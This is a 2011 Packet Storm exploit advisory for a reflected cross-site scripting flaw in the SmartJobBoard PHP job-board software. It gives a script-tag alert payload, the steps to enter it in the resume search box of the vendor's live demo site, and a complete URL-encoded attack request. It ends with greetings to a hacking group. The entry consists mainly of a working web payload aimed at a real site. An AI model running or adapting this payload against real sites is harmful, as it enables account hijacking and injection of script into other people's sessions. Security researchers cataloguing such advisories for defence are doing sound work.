SmartJobBoard Cross Site Scripting

2011-11-06T00:00:00
ID PACKETSTORM:106637
Type packetstorm
Reporter Mr.PaPaRoSSe
Modified 2011-11-06T00:00:00

Description

                                        
                                            `  
# Exploit Title: SmartJobBoard XSS  
# Date: 05.11.2011 - 18.14  
# Author: Mr.PaPaRoSSe  
# Tested On: BackTrack 5 - Win7  
# Platform: Php  
  
-------------------------------------------------------------  
<script>alert("DDz Mr.PaPaRoSSe")</script>  
  
DEMO:  
http://www.smartjobboard.com/demo/search-resumes/  
  
Keywords : <script>alert("DDz Mr.PaPaRoSSe")</script> Enter  
  
http://www.smartjobboard.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E  
  
-------------------------------------------------------------  
Contact: paparosse.blogspot.com  
Greetz: Http://DarkDevilz.in/  
-------------------------------------------------------------  
3spi0n - ALEXTRAX - sanTiq0   
Deathless - ZyX - Tarxes  
53rh4+ - bLaCk_uMo - PeRs   
syntaX - Mavi_Karalik - DarkCOD3R  
x-Leader - Cyborg - Y2J  
  
~ And All DD'z Family  
-------------------------------------------------------------  
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#  
  
  
`